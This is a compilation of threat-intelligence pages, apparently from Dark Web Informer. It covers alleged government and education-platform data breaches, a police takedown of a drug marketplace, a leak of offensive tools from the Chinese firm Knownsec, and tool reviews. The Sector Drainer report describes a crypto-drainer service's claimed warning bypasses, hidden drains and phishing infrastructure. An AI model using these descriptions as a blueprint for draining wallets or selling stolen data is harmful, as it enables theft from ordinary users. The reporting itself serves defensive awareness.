⚠️ Analytical Limitations World Monitor is an aggregation and visualization tool, not a vetted intelligence product. The AI classifications, instability scores, and convergence alerts are algorithmic outputs that should be treated as indicators for further investigation, not ground truth. Baseline country risk scores and conflict zone floors are hard-coded editorial decisions. **API key dependencies.** Full functionality requires API keys from Groq, Upstash Redis, OpenSky, VesselFinder, and NASA FIRMS. The tool works without them (falling back to browser-side ML and reduced data layers), but the experience is significantly degraded without the external data sources. **No self-hosted Docker yet.** The current architecture is optimized for Vercel deployment with Edge Functions. A self-hosted Docker image is on the roadmap but not yet available. Users who can't or won't use Vercel will need to adapt the edge functions to a different hosting model. **Data source reliability.** The system monitors 14 data sources for freshness and explicitly reports intelligence gaps when sources go stale or fail. This is a good design pattern, but the quality of the intelligence picture is fundamentally limited by the availability and accuracy of upstream sources like GDELT, ACLED, and ADS-B transponder data. **Prediction market integration.** The system uses Polymarket geopolitical markets as leading indicators, which is an interesting signal but comes with obvious caveats about market liquidity, manipulation risk, and the gap between market probability and real-world likelihood. ## // Bottom Line World Monitor is remarkably ambitious for an open-source project. The combination of 25 data layers, multi-signal anomaly detection, AI-powered threat classification with a hybrid keyword/LLM pipeline, temporal baseline learning, geographic convergence detection, and source credibility scoring puts it in territory that was previously the domain of expensive commercial OSINT platforms. The 41.1k stars reflect genuine demand for accessible geopolitical intelligence tooling. The architecture is thoughtful — browser-first compute, graceful degradation when APIs fail, explicit intelligence gap reporting, and the "speed over perfection" approach of instant keyword classification with async LLM refinement. For OSINT practitioners, security analysts, journalists, or anyone who needs a real-time global picture, World Monitor is the most comprehensive free option available. [ GitHub Repository](https://github.com/koala73/worldmonitor) [ Live Dashboard](https://worldmonitor.app) World Monitor is an open-source intelligence aggregation tool. Algorithmic outputs (threat classifications, instability scores, convergence alerts) are indicators for further investigation, not vetted intelligence products. Data accuracy depends on upstream sources. ### Daily Dose of Dark Web Informer - March 18th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-18th-2026/ Last updated: 2026-03-18T21:38:41.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts ❗️ [Partial Leak of Knownsec Corporate Documents Resurfaces With Espionage Tradecraft, Offensive Cyber Tools, and Global Targeting Evidence](https://darkwebinformer.com/partial-leak-of-knownsec-corporate-documents-resurfaces-with-espionage-tradecraft-offensive-cyber-tools-and-global-targeting-evidence/) FREE ❗️ [Alleged Breach of Daryn Online Exposes 4 Million User Records From Kazakhstan's Largest Education Platform](https://darkwebinformer.com/alleged-breach-of-daryn-online-exposes-4-million-user-records-from-kazakhstans-largest-education-platform/) FREE ❗️ [Sector Drainer Advertised as Crypto Wallet Drainer-as-a-Service With 0-Day Phantom Bypass, Hidden Drain, and Autowithdraw Capabilities](https://darkwebinformer.com/sector-drainer-advertised-as-crypto-wallet-drainer-as-a-service-with-0-day-phantom-bypass-hidden-drain-and-autowithdraw-capabilities/) FREE ❗️ [Alleged Breach of Tanzania's BRELA Government Database Exposes 10.2 Million Records Including 8 Million Individuals](https://darkwebinformer.com/alleged-breach-of-tanzanias-brela-government-database-exposes-10-2-million-records-including-8-million-individuals/) FREE 📰 [Metropolitan Police Seize Dark Web Drug Marketplace With Nearly £2 Million in Annual Sales](https://darkwebinformer.com/metropolitan-police-seize-dark-web-drug-marketplace-with-nearly-2-million-in-annual-sales/) FREE X/Twitter Updates ❗️ [A threat actor claiming affiliation with "Team CyberCrime Indonesia" has allegedly leaked data on Bangladesh and India garment exporters for free.](https://x.com/DarkWebInformer/status/2034280422100648248?s=20) 💡 [Community Alert: Security researcher Ryan Moran has published a writeup on Session for Desktop (@session\_app) detailing a critical Electron misconfiguration that escalates any XSS or code injection bug into a full remote account compromise.](https://x.com/DarkWebInformer/status/2034284457578942648?s=20) ❗️ [A threat actor is auctioning Shopify API access to a Canadian e-commerce store processing approximately 1,213 weekly orders. The listing includes API privileges.](https://x.com/DarkWebInformer/status/2034294339610804587?s=20) ❗️ [A threat actor is allegedly selling Iraqi electoral register databases for citizens aged 18 and above, with multiple versions available spanning several years.](https://x.com/DarkWebInformer/status/2034298692585263119?s=20) ❗️ [A threat actor is allegedly selling scraped data from the Fédération Française de Rugby (French Rugby Federation) spanning 2003 to 2026.](https://x.com/DarkWebInformer/status/2034302442406306200?s=20) ❗️ [A threat actor claims to have conducted a large-scale breach targeting the surveillance and data systems of an unnamed Iranian nuclear facility, classified as "Top Secret."](https://x.com/DarkWebInformer/status/2034308081442513282?s=20) 💡 [Cybersecurity and Infrastructure Security Agency (CISA) has just purchased the domain name "aliens.gov"](https://x.com/DarkWebInformer/status/2034327903110934775?s=20) ❗️ [A threat actor is selling government and police email access along with law enforcement portal credentials for Emergency Data Requests (EDRs) across multiple countries.](https://x.com/DarkWebInformer/status/2034332552308154701?s=20) ❗️ [A threat actor claims to be selling a database from Credit Institute Vietnam containing 100 million records with customer personal and financial information including names, phone numbers, emails, dates of birth, tax codes, credit card numbers, and account balances.](https://x.com/DarkWebInformer/status/2034345214685430223?s=20) ❗️ [CVE-2026-21236: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability](https://x.com/DarkWebInformer/status/2034359036196372698?s=20) 💡 [CISA has added 2 vulnerabilities to the KEV Catalog](https://x.com/DarkWebInformer/status/2034360978091942263?s=20) 💡 [One change is coming this weekend and another in the coming week. I will be removing the Pro/Elite feed.](https://x.com/DarkWebInformer/status/2034372022029967779?s=20) ❗️ [A threat actor has allegedly leaked the database of Remote3.co, a popular crypto work finder platform, exposing over 46,000 unique users.](https://x.com/DarkWebInformer/status/2034380727102378223?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Metropolitan Police Seize Dark Web Drug Marketplace With Nearly £2 Million in Annual Sales URL: https://darkwebinformer.com/metropolitan-police-seize-dark-web-drug-marketplace-with-nearly-2-million-in-annual-sales/ Last updated: 2026-03-18T18:57:38.000Z A dark web marketplace responsible for millions of pounds in illegal drug transactions [has been taken down](https://uk.news.yahoo.com/police-seize-2m-drug-marketplace-191303328.html) following an undercover operation by the Metropolitan Police. The site, called AEGIS Marketplace, first came to the attention of the [Met's Cyber Crime Unit in June 2025](https://hounslowherald.com/dark-web-drug-site-seized-after-secret-met-police-operation-p31263-249.htm). It operated as a platform where individual vendors could list drugs for sale, with buyers paying via cryptocurrency. By March 2026, the marketplace had grown to include 30 active sellers and was believed to have facilitated roughly 10,000 drug transactions over the course of ten months, generating an estimated annual turnover close to £2 million. Officers successfully infiltrated the platform and obtained server data, which enabled them to identify site administrators, sellers, and customers. Anyone attempting to visit the site now encounters a banner reading "this website has been seized." Investigators are continuing to work through the data with the aim of bringing prosecutions against those involved. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/The-Aegis-Marketplace-homepage-after-being-seized.png) Will Lyne, who heads the Met's Economic and Cyber Crime division, said the operation demonstrated the force's commitment to dismantling complex digital platforms and disrupting criminal networks. He warned that offenders who believe the dark web offers them a shield from law enforcement should reconsider. The takedown comes amid a broader wave of international cybercrime enforcement actions in recent months, including operations targeting stolen data forums and large-scale phishing networks across dozens of countries. ### Alleged Breach of Tanzania's BRELA Government Database Exposes 10.2 Million Records Including 8 Million Individuals URL: https://darkwebinformer.com/alleged-breach-of-tanzanias-brela-government-database-exposes-10-2-million-records-including-8-million-individuals/ Last updated: 2026-03-21T16:25:29.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Tanzania's BRELA Government Database Exposes 10.2 Million Records Including 8 Million Individuals March 18, 2026 - 1:38:37 PM UTC Tanzania Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-18 13:38:37 UTC Threat Actor Spirigatito Victim BRELA (Tanzania) Industry Government Category Data Breach Alleged Records 10.2 Million Individuals Affected \~8 Million Databases 6 Price Credits (Crypto) Breach Date February 4, 2026 Network Open Web Country Tanzania ## Incident Overview A threat actor going by Spirigatito claims to have compromised Tanzanian government infrastructure linked to BRELA (The Business Registrations and Licensing Agency), allegedly retrieving 10.2 million records that include data on approximately 8 million individuals. The actor states the breach occurred on February 4, 2026, and that after the Tanzanian government chose to ignore them, they decided to make the data available for purchase through a dedicated marketplace. Rather than selling the data as a single dump, the actor has built a custom storefront that organizes the stolen records across 6 curated databases, each priced in credits that can be recharged via cryptocurrency (BTC, ETH, USDT, XMR, and 50+ other cryptocurrencies through OxaPay). The databases and their record counts are: - **Business Names (Registry)**: 369K records containing registered business names, sole proprietors, and trade names with full applicant info, location, owner details, and activities. Priced at 2 credits. - **Companies (Corporate)**: 279K records of limited companies with full incorporation data, directors, share capital, registered address, and filing history. Priced at 5 credits. - **Corporate Shareholders (Equity)**: 7K records of shareholder records, equity positions, beneficial ownership, and stake changes. Priced at 8 credits. - **People (Contacts)**: 2.2 million records of individual profiles with verified contact information, demographics, and location data. Priced at 3 credits. - **TRA TINs (Tax)**: 7.4 million Tax Identification Numbers from the Tanzania Revenue Authority registry. Priced at 4 credits. - **Wabunge (Government)**: 407 records of Members of Parliament with constituency data, party affiliations, and contact records. Priced at 6 credits. The marketplace offers data in CSV or JSON format with automatic downloads, preview data and field descriptions for each database, and promotes itself as offering leads from Tanzanians for low cost. The actor also notes that the entire database is still available for bulk purchase. This represents a significant government data breach affecting a substantial portion of Tanzania's formally registered population, business ecosystem, and tax records. ## Compromised Data Categories Business Registration Records Corporate Incorporation Data Director & Officer Details Shareholder & Equity Records Individual Contact Information Demographics & Location Data Tax Identification Numbers (TINs) Parliamentary Records Party Affiliations Business Owner Details ## Image Preview [![Forum post by Spirigatito showing BRELA marketplace with 6 databases totaling 10.2 million records from Tanzanian government infrastructure](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/78304038897825111463.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/78304038897825111463.png) [![BRELA marketplace showing credit recharge system, purchasing workflow, and cryptocurrency payment options for stolen Tanzanian government data](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/78304038897825111464.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/78304038897825111464.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in government web applications and infrastructure to gain unauthorized access to backend databases and registries. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured records from government registries including business registrations, corporate filings, tax records, and parliamentary data across 6 separate databases. ](https://attack.mitre.org/techniques/T1213/) [ T1005 Data from Local System Collects data directly from compromised government systems, extracting full database tables with millions of records including personal and corporate information. ](https://attack.mitre.org/techniques/T1005/) [ T1560 Archive Collected Data Organizes and packages stolen data into structured CSV and JSON formats across 6 categorized databases for distribution through a custom marketplace. ](https://attack.mitre.org/techniques/T1560/) [ T1567 Exfiltration Over Web Service Distributes stolen government data through a purpose-built web marketplace with automated downloads, credit-based purchasing, and cryptocurrency payment processing. ](https://attack.mitre.org/techniques/T1567/) [ T1589.002 Gather Victim Identity: Email Addresses Harvests personal contact information, demographics, and identification details for 8 million individuals from government registries for resale as leads. ](https://attack.mitre.org/techniques/T1589/002/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Sector Drainer Advertised as Crypto Wallet Drainer-as-a-Service With 0-Day Phantom Bypass, Hidden Drain, and Autowithdraw Capabilities URL: https://darkwebinformer.com/sector-drainer-advertised-as-crypto-wallet-drainer-as-a-service-with-0-day-phantom-bypass-hidden-drain-and-autowithdraw-capabilities/ Last updated: 2026-03-21T16:26:44.000Z Dark Web Informer - Cyber Threat Intelligence # Sector Drainer Advertised as Crypto Wallet Drainer-as-a-Service With 0-Day Phantom Bypass, Hidden Drain, and Autowithdraw Capabilities March 18, 2026 - 1:06:24 PM UTC N/A Cryptocurrency / Cybercrime Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-18 13:06:24 UTC Threat Actor SectorD Service Name Sector Drainer Category Drainer-as-a-Service (DaaS) Severity High Wallets Supported 150+ Revenue Model 80/20 Revshare Claimed Profits \>$4M (Team Total) Network Open Web Active Since 2024 (Claimed) ## Incident Overview A threat actor going by SectorD is advertising a drainer-as-a-service platform called Sector Drainer, marketed as a full-stack crypto wallet draining solution with claimed 0-day exploits, scam warning bypasses, and turnkey phishing infrastructure. The actor claims the operation has been running since 2024 with hundreds of partners and over $4 million in total team profits. The listing is broken into several capability categories: - **Exploit Capabilities**: Claims a 0-day Phantom exploit that bypasses Lighthouse and Safeguard protections to perform hidden drains starting from assets as low as $5-10\. The service also claims hidden drain functionality across all wallets updated through 2025-2026, fake token receiving via honeypot techniques, and unique spoofing for Trust Wallet, Phantom, MetaMask, and Rabby. - **Security Bypasses**: Claims to bypass scam warnings on Phantom, MetaMask, SEAL, Blockaid, Hashdit, Scam Sniffer, and WalletGuard. Also claims full bypass of in-app browsers on Telegram, X (Twitter), and Discord. - **Drainer Features**: Supports over 150 wallets with deep link and QR code connection methods. Capable of draining TRC20, BEP20, ETH, SOL tokens, NFTs, native staked assets, and DeFi positions. Includes gasless transactions via fee sponsorship, automatic profit splitting, and autowithdraw that triggers on any victim wallet top-up with no expiration. Claims wallet scan times under 0.4 seconds and transaction confirmation under 0.8 seconds on self-hosted infrastructure with no external API dependencies. - **Infrastructure**: Includes free domains, hosting, cloaking, and DDoS protection. Provides 70+ pre-built landing pages for fake airdrops, mints, claims, and similar lures, along with a landing generation tool, site copying capabilities, and an advanced landing API. - **Business Model**: Operates on a revshare basis starting at 80/20 (partner keeps 80%) scaling to 90/10 after reaching $5-10K in stolen funds. Minimum deposit varies, with some examples listing $1,000\. Setup is claimed to take 10 minutes. Worth noting that the actor's forum account was created in March 2026 with only 1 post, 1 thread, and 0 reputation, which is a common profile for newly registered accounts advertising DaaS platforms. The listing includes a high-conversion wallet connect UI/UX claim of over 95%, 24/7 support via Telegram, and full documentation. The actor directs interested parties to contact via Telegram or Session messaging. ## Targeted Assets & Platforms Phantom Wallet MetaMask Trust Wallet Rabby Wallet 150+ Additional Wallets ETH / ERC-20 Tokens SOL / SPL Tokens TRC-20 / BEP-20 Tokens NFTs Native Staked Assets DeFi Positions Telegram In-App Browser X (Twitter) In-App Browser Discord In-App Browser ## Image Preview [![Forum post by SectorD advertising Sector Drainer crypto wallet drainer-as-a-service with exploit capabilities, bypass features, and revenue share terms](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/11064200277848867388.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/11064200277848867388.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1566.002 Phishing: Spearphishing Link Uses fake airdrop, mint, and claim landing pages to lure victims into connecting their wallets, serving as the primary delivery mechanism for the drainer. ](https://attack.mitre.org/techniques/T1566/002/) [ T1204.001 User Execution: Malicious Link Relies on victims clicking malicious links and approving wallet transactions on spoofed landing pages designed to appear legitimate. ](https://attack.mitre.org/techniques/T1204/001/) [ T1036 Masquerading Spoofs legitimate wallet interfaces for Trust Wallet, Phantom, MetaMask, and Rabby to trick users into authorizing malicious transactions. ](https://attack.mitre.org/techniques/T1036/) [ T1562.001 Impair Defenses: Disable or Modify Tools Bypasses scam detection warnings from security tools like SEAL, Blockaid, Hashdit, Scam Sniffer, and WalletGuard to prevent victims from being alerted. ](https://attack.mitre.org/techniques/T1562/001/) [ T1059 Command and Scripting Interpreter Executes automated scripts to scan wallets in under 0.4 seconds, identify drainable assets across multiple token standards, and initiate transactions. ](https://attack.mitre.org/techniques/T1059/) [ T1102 Web Service Leverages Telegram, X, and Discord in-app browsers as attack vectors, and uses legitimate web infrastructure with cloaking and DDoS protection to host phishing pages. ](https://attack.mitre.org/techniques/T1102/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Breach of Daryn Online Exposes 4 Million User Records From Kazakhstan's Largest Education Platform URL: https://darkwebinformer.com/alleged-breach-of-daryn-online-exposes-4-million-user-records-from-kazakhstans-largest-education-platform/ Last updated: 2026-03-18T16:26:34.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Daryn Online Exposes 4 Million User Records From Kazakhstan's Largest Education Platform March 18, 2026 - 6:21:24 AM UTC Kazakhstan Education Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-18 06:21:24 UTC Threat Actor Shinchan Victim Daryn Online (daryn.online) Industry Education Category Data Breach Alleged Records \~4 Million Users Data Size 1 GB+ Price Contact Seller Network Open Web Country Kazakhstan ## Incident Overview A threat actor going by Shinchan claims to be selling a full user database from Daryn Online, one of Kazakhstan's largest online education platforms. Launched in 2019 and backed by Bugin Holding, the platform offers 28 different educational services including school curriculum support, national exam preparation (ENT/UBT), robotics courses, and art programs, reportedly serving over 3.5 million active users across the region. The actor is selling the complete dataset only, with no partial sales available. The listing specifies the following data fields are included: - **Personal Information**: First names, last names, and birthdates for each user account. - **Contact Data**: Phone numbers and email addresses. - **Credentials**: Passwords, remember tokens, email hash tokens, and mobile tokens, which could allow direct account takeover if the tokens are still valid. - **Profile Data**: Avatar URLs and associated profile details. - **Scale**: Approximately 4 million user records totaling over 1GB of data. The inclusion of authentication tokens alongside passwords makes this particularly dangerous. Even if passwords have been changed, valid remember tokens or mobile tokens could still grant access to user accounts without needing the updated credentials. Given the platform's user base consists largely of students, many of the affected individuals are likely minors. The actor provided data proof screenshots and sample records to demonstrate authenticity, and is directing buyers to contact them via Telegram or Session for pricing. ## Compromised Data Categories Full Names Phone Numbers Email Addresses Passwords Authentication Tokens Email Hash Tokens Mobile Tokens Birthdates Avatar / Profile Data ## Image Preview [![Forum post by Shinchan selling 4 million user records from Daryn Online education platform with data fields and sample](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/89001376920773178813.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/89001376920773178813.png) [![Data proof and contact details for Daryn Online breach listing including pricing and escrow instructions](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/89001376920773178814.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/89001376920773178814.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in internet-facing web applications to gain unauthorized access to backend databases containing user records. ](https://attack.mitre.org/techniques/T1190/) [ T1555 Credentials from Password Stores Extracts stored passwords and authentication credentials from the platform's database, enabling direct account takeover for millions of users. ](https://attack.mitre.org/techniques/T1555/) [ T1528 Steal Application Access Token Harvests remember tokens, email hash tokens, and mobile tokens that can be used to bypass authentication and access accounts without passwords. ](https://attack.mitre.org/techniques/T1528/) [ T1213 Data from Information Repositories Extracts structured user data from application databases, pulling personal information, credentials, and profile details from the platform's backend. ](https://attack.mitre.org/techniques/T1213/) [ T1589.002 Gather Victim Identity: Email Addresses Collects email addresses and phone numbers from the breached database for resale, enabling phishing, credential stuffing, and social engineering attacks. ](https://attack.mitre.org/techniques/T1589/002/) [ T1567 Exfiltration Over Web Service Uses web forums, Telegram, and Session messaging to advertise, distribute samples, and sell the stolen database to interested buyers. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Partial Leak of Knownsec Corporate Documents Resurfaces With Espionage Tradecraft, Offensive Cyber Tools, and Global Targeting Evidence URL: https://darkwebinformer.com/partial-leak-of-knownsec-corporate-documents-resurfaces-with-espionage-tradecraft-offensive-cyber-tools-and-global-targeting-evidence/ Last updated: 2026-03-18T15:24:27.000Z Dark Web Informer - Cyber Threat Intelligence # Partial Leak of Knownsec Corporate Documents Resurfaces With Espionage Tradecraft, Offensive Cyber Tools, and Global Targeting Evidence March 18, 2026 - 12:56:35 AM UTC China Cybersecurity / Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-18 00:56:35 UTC Threat Actor Blastoize Victim Knownsec (知道创宇) Industry Cybersecurity / Government Category Corporate Document Leak Leak Status Partial Download Original Breach November 2025 Original Documents 12,000+ Classified Files Price Free (Partial Leak) Network Open Web Country China Severity Critical ## Incident Overview A threat actor going by Blastoize has posted a partial download of corporate documents from Knownsec, a major Chinese cybersecurity firm with well-documented ties to the Chinese government and military. This is not a new breach but rather a redistribution of data from the original Knownsec leak that first surfaced in November 2025, which has been widely regarded as one of the most significant exposures of state-sponsored cyber capabilities in recent years. The actor references reporting from both Gopher Security and Resecurity that provide extensive analysis of the leaked material. The original breach exposed over 12,000 classified documents and revealed the inner workings of a firm that operates at the intersection of China's commercial cybersecurity sector and its state intelligence apparatus. Key revelations from the original leak include: - **Offensive Cyber Tools**: Remote Access Trojans (RATs) engineered for Linux, Windows, macOS, iOS, and Android, plus Android-specific malware designed to extract message histories from Chinese chat applications and Telegram. - **Hardware Attack Vectors**: Physical devices including a malicious power bank engineered to covertly upload data from victims' devices while appearing to function as a standard charger. - **Global Target Lists**: Spreadsheets documenting over 80 overseas targets across more than 20 countries, including government agencies, telecommunications providers, and critical infrastructure operators. - **Stolen Data at Scale**: Evidence of massive exfiltration operations including 95GB of Indian immigration records, 3TB of South Korean call records from LG U Plus, and 459GB of Taiwanese road planning data. - **Government Collaboration**: Documents showing direct collaboration with Chinese government agencies including Chinese Police No.3 Research Department on data collection and network entity research projects. - **Internal Surveillance**: Tools used not only externally against foreign targets but also internally to track Chinese companies and individuals for intelligence, control, and counterintelligence purposes. The Chinese government has officially denied and downplayed the incident. When questioned, the Chinese Foreign Ministry stated they were unaware of any breach at Knownsec and reiterated that China "firmly opposes and combats all forms of cyberattacks." Resecurity's analysis suggests the source of the original leak was likely an insider (rogue employee) rather than an external hack, drawing parallels to the i-Soon leak that exposed similar state-linked cyber operations in 2024\. The fact that this data continues to resurface and circulate months later underscores its significance to the threat intelligence community. ## Exposed Data Categories Classified Corporate Documents Offensive Cyber Tool Source Code Remote Access Trojans (RATs) Hardware Attack Tool Specifications Global Surveillance Target Lists Government Collaboration Records Stolen Foreign Government Data Telecommunications Intercept Records Critical Infrastructure Intelligence Internal Operational Procedures ## Image Preview [![Forum post by Blastoize sharing partial download of Knownsec corporate documents with references to Gopher Security and Resecurity reporting on Chinese cyber espionage tradecraft](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/88488731072876874213.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/88488731072876874213.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) ## MITRE ATT&CK Mapping [ T1587.001 Develop Capabilities: Malware Develops custom malware including RATs for multiple operating systems, enabling persistent remote access to compromised targets worldwide. ](https://attack.mitre.org/techniques/T1587/001/) [ T1195.002 Supply Chain Compromise: Software Uses hardware-based attack tools like modified power banks to covertly exfiltrate data from victims' devices through supply chain manipulation. ](https://attack.mitre.org/techniques/T1195/002/) [ T1005 Data from Local System Collects massive volumes of data from compromised systems, including immigration records, telecom call logs, and critical infrastructure data across multiple countries. ](https://attack.mitre.org/techniques/T1005/) [ T1059 Command and Scripting Interpreter Deploys cross-platform RATs that execute commands and scripts on victim machines across Linux, Windows, macOS, iOS, and Android environments. ](https://attack.mitre.org/techniques/T1059/) [ T1557 Adversary-in-the-Middle Intercepts communications and data in transit, evidenced by the 3TB of telecom call records exfiltrated from South Korean provider LG U Plus. ](https://attack.mitre.org/techniques/T1557/) [ T1592 Gather Victim Host Information Uses ZoomEye, Knownsec's global vulnerability scanning tool, to map and enumerate target infrastructure, building a Critical Infrastructure Target Database prioritizing Taiwan, the US, Japan, India, and Korea. ](https://attack.mitre.org/techniques/T1592/) [ T1199 Trusted Relationship Leverages Knownsec's position as a trusted cybersecurity provider to access client systems and government networks under the guise of legitimate security services. ](https://attack.mitre.org/techniques/T1199/) [ T1048 Exfiltration Over Alternative Protocol Transfers massive stolen datasets out of target environments using alternative channels, with documented exfiltration of hundreds of gigabytes per operation. ](https://attack.mitre.org/techniques/T1048/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### changedetection.io: Self-Hosted Website Change Monitoring with 30k Stars and 203 Releases URL: https://darkwebinformer.com/changedetection-io-self-hosted-website-change-monitoring-with-30k-stars-and-203-releases/ Last updated: 2026-03-17T17:36:10.000Z Tool Spotlight Monitoring Open Source Mar 15, 2026 # changedetection.io: Self-Hosted Website Change Monitoring with 30k Stars and 203 Releases A self-hosted tool that watches web pages for changes and sends you alerts via Discord, Slack, Telegram, email, and 80+ other notification channels. Supports visual element selection, browser automation steps, price/restock tracking, JSON API monitoring, PDF changes, and conditional triggers. Docker one-liner to deploy. dgtlmoon / changedetection.io Best and simplest tool for website change detection, web page monitoring, and website change alerts. Python 80.9% HTML 7.6% JavaScript 7.3% ★ 30.7k stars v0.54.4 Apache-2.0 1.7k forks 2,249 commits 125 contributors There's a surprisingly large category of problems that boil down to "tell me when this web page changes." Price drops on a product you're watching. Government regulatory updates that only appear on a website. Job postings on a company's careers page. A PDF that gets silently updated. Restock alerts. Security advisories. Legal document revisions. The list goes on. **changedetection.io** is a self-hosted Python application that solves this with a web UI, a massive notification ecosystem, and support for everything from simple text changes to complex JavaScript-rendered pages behind login walls. With 30.7k stars, 203 releases, and active development, it's the most popular open-source website change monitoring tool available. ## // Key 